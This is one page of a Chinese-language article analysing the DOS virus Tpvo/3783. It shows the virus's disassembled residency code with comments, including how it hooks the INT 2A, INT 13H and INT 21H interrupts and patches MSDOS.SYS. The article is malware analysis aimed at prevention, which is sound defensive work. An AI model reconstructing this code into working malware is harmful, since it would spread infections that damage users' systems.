; 文件驻留引入 INT 2A 代码部分
; 初始化时使用
;==========================================================================
F6C8:0351 60　　　　　　PUSHA　
F6C8:0352 1E　　　　　　PUSH　　DS
F6C8:0353 06　　　　　　PUSH　　ES
F6C8:0354 2E　　　　　　CS:
F6C8:0355 C606FF00EB　　MOV　　 BYTE PTR [00FF],EB ;INT 13H
F6C8:035A 2E　　　　　　CS: ;不检测
F6C8:035B C60658053D　　MOV　　 BYTE PTR [0558],3D ;INT 21H 不检测
F6C8:0360 B80016　　　　MOV　　 AX,1600 ;WINDOWS 增强模式检验
F6C8:0363 CD2F　　　　　INT　　 2F
F6C8:0365 0AC0　　　　　OR　　　AL,AL
F6C8:0367 7505　　　　　JNZ　　 036E ;WINDOWS 运行转 036E
F6C8:0369 E881FE　　　　CALL　　01ED ;随机生成 INT 13H 地址
F6C8:036C EB03　　　　　JMP　　 0371
F6C8:036E E8B9FE　　　　CALL　　022A ;随机生成 INT 13H 地址
F6C8:0371 B80013　　　　MOV　　 AX,1300 ;取得原 INT 13H 地址
F6C8:0374 8BD3　　　　　MOV　　 DX,BX ;并设置新 INT 13H 地址
F6C8:0376 06　　　　　　PUSH　　ES
F6C8:0377 1F　　　　　　POP　　 DS ;INT 2F 之 1300 功能
F6C8:0378 CD2F　　　　　INT　　 2F ;入口　ES:BX 及 DS:DX
F6C8:037A 2E　　　　　　CS: ;为新 INT 13H 地址
F6C8:037B 8916F800　　　MOV　　 [00F8],DX ;出口　ES:BX 及 DS:DX
F6C8:037F 2E　　　　　　CS: ;为旧 INT 13H 地址
F6C8:0380 8C1EFA00　　　MOV　　 [00FA],DS
F6C8:0384 EB03　　　　　JMP　　 0389 ;转截取 INT 21H (0389)
;==========================================================================
;BOOT 引导驻留引入 INT 2A 入口
F6C8:0386 60　　　　　　PUSHA　
F6C8:0387 1E　　　　　　PUSH　　DS
F6C8:0388 06　　　　　　PUSH　　ES
;==========================================================================
;截取 INT 21H 代码部分
F6C8:0389 B80312　　　　MOV　　 AX,1203 ;取 MSDOS.SYS 数据段地址
F6C8:038C CD2F　　　　　INT　　 2F ;返回段地址 = DS
F6C8:038E 8CD8　　　　　MOV　　 AX,DS
F6C8:0390 8CD6　　　　　MOV　　 SI,SS
F6C8:0392 2BF0　　　　　SUB　　 SI,AX
F6C8:0394 7403　　　　　JZ　　　0399 ;在 MSDOS.SYS 中执行
F6C8:0396 E99D00　　　　JMP　　 0436 ;转 0399, 否则退出
F6C8:0399 0E　　　　　　PUSH　　CS
F6C8:039A 1F　　　　　　POP　　 DS
F6C8:039B A33101　　　　MOV　　 [0131],AX
F6C8:039E C606C00DEB　　MOV　　 BYTE PTR [0DC0],EB
F6C8:03A3 C6060401EB　　MOV　　 BYTE PTR [0104],EB
F6C8:03A8 C4063A04　　　LES　　 AX,[043A]
F6C8:03AC 8EDE　　　　　MOV　　 DS,SI
F6C8:03AE A3A800　　　　MOV　　 [00A8],AX
F6C8:03B1 8C06AA00　　　MOV　　 [00AA],ES ;恢复原 INT 2A 中断向量
F6C8:03B5 8BEC　　　　　MOV　　 BP,SP
F6C8:03B7 8E5E16　　　　MOV　　 DS,[BP+16] ;调用代码段
F6C8:03BA 83FE80　　　　CMP　　 SI,-80 ;为 INT 21 的代码段
F6C8:03BD 7777　　　　　JA　　　0436
F6C8:03BF AC　　　　　　LODSB　
F6C8:03C0 3C2E　　　　　CMP　　 AL,2E ;找 2E 8B 9F xx xx
F6C8:03C2 75F6　　　　　JNZ　　 03BA ;即 MOV BX,CS:[BX+xxxx]
F6C8:03C4 AD　　　　　　LODSW　
F6C8:03C5 3D8B9F　　　　CMP　　 AX,9F8B

上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] [28] [29] [30] 下一页

上一篇:Windows新漏洞将任意用户提升到SYSTEM级别的权限的方法

下一篇:Burglar 病毒的分析和防治

Tpvo/3783 病毒的分析和防治相关文章：

·配置Catalyst交换端口分析器（SPAN）

·ORACLE常见错误代码的分析与解决之二

·电脑死机的故障分析

·统计分析Web服务器日志

·QQ号的木马病毒(Trojan/PSW.QQPass)_盗取QQ账号

·文晟扫描5. 0 之破解经过算法分析

Tpvo/3783 病毒的分析和防治相关软件：

·3D 动画与建模：人体的综合与分析技术

·Windows蠕虫病毒专杀定制工具 V0.0.6

·建设部监理师-案例分析录音16

·U盘病毒专杀工具(USBCleaner)V6.0 Build 20070812

·频谱分析仪V1.10

·属相分析大师 V1.0

·瑞星“墨菲（Trojan.Mofei）”病毒专杀工具 V1.4

·冲击波病毒专杀工具包 V 1.0

·瑞星“Zotob蠕虫(Worm.Zotob)”病毒专杀工具 V1.00

·“魔兽木马”病毒专杀 V3.0

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源：http://www.viphot.com

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.viphot.com All Rights Reserved.	鄂ICP备05000083号Powered by:viphot